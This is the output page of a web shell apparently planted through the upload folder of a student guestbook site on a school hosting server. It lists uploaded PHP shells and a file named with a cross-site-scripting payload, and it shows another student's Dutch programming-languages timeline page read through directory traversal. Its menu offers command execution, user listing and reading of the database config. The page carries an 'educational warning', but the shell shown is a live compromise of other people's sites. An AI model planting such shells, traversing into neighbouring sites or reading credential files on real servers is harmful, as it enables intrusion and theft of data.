🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../580880.klas4s23.mid-ica.nl/public_html/Wire/decoding.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Programming Languages Timeline</title>
    <link rel="stylesheet" href="everything/css/temp.css"> <!-- Link to your separate CSS file -->
</head>
<body>
    <header>
        <div class="logo">
            <img src="everything/media/TechnoWire%20_banner%20-%20kopie.png" width="300px">
        </div>
        <input type="checkbox" id="nav_check" hidden>
        <nav>
            <ul>
                <li>
                    <a href="index.html" class="active">Home</a>
                </li>
                <li>
                    <a href="ithallofffame.html">It hall of fame</a>
                </li>
                <li>
                    <a href="decoding.html">Decoding History</a>
                </li>
                <li>
                    <a href="silliconvalley.html">Silicon Valley</a>
                </li>
            </ul>
        </nav>
        <label for="nav_check" class="hamburger">
            <div></div>
            <div></div>
            <div></div>
        </label>
    </header>
    


<div class="timeline">
    <div class="container left">
        <div class="content">
            <h2>1983</h2>
            <img src="everything/media/ISO_C++_Logo.svg.png" alt="" width="75">
            <p>C++ (Bjarne Stroustrup)<br>
                C++ staat relatief dicht bij de hardware, wat veel controle geeft in termen van geheugenbeheer, performance en uiteindelijk een robuuste softwareontwikkeling.</p>
        </div>
    </div>
    <div class="container right">
        <div class="content">
            <h2>1991</h2>
            <img src="everything/media/python-programming-language.png" alt="" width="75"
            <p>Python (Guido van Rossum)<br>
                Python wordt veel gebruikt bij de ontwikkeling van webapplicaties en voor data science.</p>
        </div>
    </div>
    <div class="container left">
        <div class="content">
            <h2>1993</h2>
            <img src="everything/media/html.png" alt="" width="75">
            <p>HTML (Tim Berners-Lee)<br>
                De belangrijkste eigenschap van HTML is dat je pagina’s en paginaelementen kan koppelen met hyperlinks. Ook vormt het de basis voor een website.</p>
        </div>
    </div>
    <div class="container right">
        <div class="content">
            <h2>1995</h2>
            <img src="everything/media/java.png" alt="" width="75">
            <p>Javascript (Brendan Eich)<br>
                Met Javascript kan je je website interactief maken. Je kan bijvoorbeeld makkelijk animaties toevoegen.</p>
        </div>
    </div>
    <div class="container left">
        <div class="content">
            <h2>1995</h2>
            <img src="everything/media/PHP-logo.svg.png" alt="" width="75">
            <p>PHP (Rasmus Lerdorf)<br>
                PHP is een server gebaseerde opensource scripttaal die voornamelijk dient voor het maken van dynamische webpagina’s.</p>
        </div>
    </div>
    <div class="container right">
        <div class="content">
            <h2>1996</h2>
            <img src="everything/media/Java-Software-Development-NxTide.jpg" alt="" width="75">
            <p>Java (James Gosling)<br>
                Een specifieke eigenschap van Java is de overdraagbaarheid, veiligheid en prestaties.</p>
        </div>
    </div>
    <div class="container left">
        <div class="content">
            <h2>1996</h2>
            <img src="everything/media/CSS3_logo_and_wordmark.svg.png" alt="" width="75">
            <p>CSS (W3C)<br>
                CSS vertelt hoe een webpagina moet worden weergeven. Het geeft een stijl aan de pagina.</p>
        </div>
    </div>
    <div class="container right">
        <div class="content">
            <h2>2001</h2>
            <img src="everything/media/csharp_banner_NxErAkn.png" alt="" width="150">
            <p>C# (Microsoft Corporation)<br>
                C# kan je gebruiken om de moderne softwaretoepassingen van vandaag te bouwen.</p>
        </div>
    </div>
    <div class="container left">
        <div class="content">
            <h2>2014</h2>
            <img src="everything/media/Swift.jpeg" alt="" width="150">
            <p>Swift (Apple Inc)<br>
                Swift wordt gebruikt voor het ontwikkelen van IOS, macOS en watchOS apps.</p>
        </div>
    </div>
</div>

</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!